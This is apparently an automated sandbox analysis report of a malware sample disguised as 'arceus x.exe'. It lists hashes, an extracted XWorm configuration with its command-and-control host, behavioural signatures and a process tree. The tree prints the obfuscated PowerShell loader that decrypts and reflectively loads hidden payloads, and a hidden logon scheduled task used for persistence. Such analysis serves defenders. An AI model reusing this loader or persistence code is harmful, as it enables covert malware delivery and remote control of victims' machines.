Analysis
-
max time kernel
48s -
max time network
48s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/06/2024, 11:22
Static task
static1
General
-
Target
arceus x.exe
-
Size
10.3MB
-
MD5
380f08da7396daa261f7edabdc161388
-
SHA1
3622717512e77bb2ea51c9af995fa1c359413d8f
-
SHA256
2f5ed04a9e2907c09ab4a3d6a984b68976926d2d99f21239bfbe8625b415ccc3
-
SHA512
f724db6274890b9472067437f69a4d0d01bc4d911a32515d52c502d8524a31c1563641fed55d2021e9853bb2c1618aec24ac23c9f074b7331be4032917598424
-
SSDEEP
196608:p6iDnLZQi21bRqt9Vs9sMm2agR2wCg6N6FYx1jg+elKIK0G8V1f83:plDLvgbRWs93dW9AFYH8kd0Ge83
Malware Config
Extracted
xworm
5.0
amount-socket.gl.at.ply.gg:29643
CBOJbsqFCwukBOQm
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3148-137-0x0000000007D90000-0x0000000007DA0000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 4128 powershell.exe 1956 powershell.exe 4656 powershell.exe 3148 powershell.exe 1792 powershell.exe 2832 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2852 2832 WerFault.exe 124 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 864 msedge.exe 864 msedge.exe 1188 msedge.exe 1188 msedge.exe 4128 powershell.exe 4128 powershell.exe 1956 powershell.exe 1956 powershell.exe 1956 powershell.exe 4128 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 2640 identity_helper.exe 2640 identity_helper.exe 2832 powershell.exe 2832 powershell.exe 3148 powershell.exe 2832 powershell.exe 1776 msedge.exe 1776 msedge.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3148 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeIncreaseQuotaPrivilege 4656 powershell.exe Token: SeSecurityPrivilege 4656 powershell.exe Token: SeTakeOwnershipPrivilege 4656 powershell.exe Token: SeLoadDriverPrivilege 4656 powershell.exe Token: SeSystemProfilePrivilege 4656 powershell.exe Token: SeSystemtimePrivilege 4656 powershell.exe Token: SeProfSingleProcessPrivilege 4656 powershell.exe Token: SeIncBasePriorityPrivilege 4656 powershell.exe Token: SeCreatePagefilePrivilege 4656 powershell.exe Token: SeBackupPrivilege 4656 powershell.exe Token: SeRestorePrivilege 4656 powershell.exe Token: SeShutdownPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeSystemEnvironmentPrivilege 4656 powershell.exe Token: SeRemoteShutdownPrivilege 4656 powershell.exe Token: SeUndockPrivilege 4656 powershell.exe Token: SeManageVolumePrivilege 4656 powershell.exe Token: 33 4656 powershell.exe Token: 34 4656 powershell.exe Token: 35 4656 powershell.exe Token: 36 4656 powershell.exe Token: SeIncreaseQuotaPrivilege 4656 powershell.exe Token: SeSecurityPrivilege 4656 powershell.exe Token: SeTakeOwnershipPrivilege 4656 powershell.exe Token: SeLoadDriverPrivilege 4656 powershell.exe Token: SeSystemProfilePrivilege 4656 powershell.exe Token: SeSystemtimePrivilege 4656 powershell.exe Token: SeProfSingleProcessPrivilege 4656 powershell.exe Token: SeIncBasePriorityPrivilege 4656 powershell.exe Token: SeCreatePagefilePrivilege 4656 powershell.exe Token: SeBackupPrivilege 4656 powershell.exe Token: SeRestorePrivilege 4656 powershell.exe Token: SeShutdownPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeSystemEnvironmentPrivilege 4656 powershell.exe Token: SeRemoteShutdownPrivilege 4656 powershell.exe Token: SeUndockPrivilege 4656 powershell.exe Token: SeManageVolumePrivilege 4656 powershell.exe Token: 33 4656 powershell.exe Token: 34 4656 powershell.exe Token: 35 4656 powershell.exe Token: 36 4656 powershell.exe Token: SeIncreaseQuotaPrivilege 4656 powershell.exe Token: SeSecurityPrivilege 4656 powershell.exe Token: SeTakeOwnershipPrivilege 4656 powershell.exe Token: SeLoadDriverPrivilege 4656 powershell.exe Token: SeSystemProfilePrivilege 4656 powershell.exe Token: SeSystemtimePrivilege 4656 powershell.exe Token: SeProfSingleProcessPrivilege 4656 powershell.exe Token: SeIncBasePriorityPrivilege 4656 powershell.exe Token: SeCreatePagefilePrivilege 4656 powershell.exe Token: SeBackupPrivilege 4656 powershell.exe Token: SeRestorePrivilege 4656 powershell.exe Token: SeShutdownPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeSystemEnvironmentPrivilege 4656 powershell.exe Token: SeRemoteShutdownPrivilege 4656 powershell.exe Token: SeUndockPrivilege 4656 powershell.exe Token: SeManageVolumePrivilege 4656 powershell.exe Token: 33 4656 powershell.exe Token: 34 4656 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3148 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1444 wrote to memory of 1792 1444 arceus x.exe 77 PID 1444 wrote to memory of 1792 1444 arceus x.exe 77 PID 1444 wrote to memory of 1792 1444 arceus x.exe 77 PID 1792 wrote to memory of 1800 1792 cmd.exe 81 PID 1792 wrote to memory of 1800 1792 cmd.exe 81 PID 1792 wrote to memory of 1800 1792 cmd.exe 81 PID 1792 wrote to memory of 4364 1792 cmd.exe 82 PID 1792 wrote to memory of 4364 1792 cmd.exe 82 PID 1792 wrote to memory of 4364 1792 cmd.exe 82 PID 1792 wrote to memory of 1624 1792 cmd.exe 83 PID 1792 wrote to memory of 1624 1792 cmd.exe 83 PID 1792 wrote to memory of 1624 1792 cmd.exe 83 PID 1792 wrote to memory of 2060 1792 cmd.exe 84 PID 1792 wrote to memory of 2060 1792 cmd.exe 84 PID 1792 wrote to memory of 2060 1792 cmd.exe 84 PID 2060 wrote to memory of 3836 2060 cmd.exe 85 PID 2060 wrote to memory of 3836 2060 cmd.exe 85 PID 2060 wrote to memory of 3836 2060 cmd.exe 85 PID 4364 wrote to memory of 3444 4364 cmd.exe 86 PID 4364 wrote to memory of 3444 4364 cmd.exe 86 PID 4364 wrote to memory of 3444 4364 cmd.exe 86 PID 1800 wrote to memory of 3556 1800 cmd.exe 89 PID 1800 wrote to memory of 3556 1800 cmd.exe 89 PID 1800 wrote to memory of 3556 1800 cmd.exe 89 PID 1624 wrote to memory of 2100 1624 cmd.exe 91 PID 1624 wrote to memory of 2100 1624 cmd.exe 91 PID 1624 wrote to memory of 2100 1624 cmd.exe 91 PID 3444 wrote to memory of 1216 3444 cmd.exe 93 PID 3444 wrote to memory of 1216 3444 cmd.exe 93 PID 3444 wrote to memory of 1216 3444 cmd.exe 93 PID 2100 wrote to memory of 1188 2100 cmd.exe 94 PID 2100 wrote to memory of 1188 2100 cmd.exe 94 PID 1188 wrote to memory of 1884 1188 msedge.exe 95 PID 1188 wrote to memory of 1884 1188 msedge.exe 95 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96 PID 1188 wrote to memory of 5048 1188 msedge.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\arceus x.exe"C:\Users\Admin\AppData\Local\Temp\arceus x.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat"4⤵PID:3556
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:3748
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_822_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1792
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs"6⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat" "7⤵PID:3128
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "8⤵PID:3852
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 16929⤵
- Program crash
PID:2852
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"5⤵PID:1216
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=fboNTcjJ8bo5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda9c33cb8,0x7ffda9c33cc8,0x7ffda9c33cd86⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:26⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:86⤵PID:788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:16⤵PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:16⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:16⤵PID:72
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:16⤵PID:1836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:16⤵PID:1160
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat"4⤵PID:3836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:3656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_172_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs"6⤵PID:2080
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat" "7⤵PID:1652
-
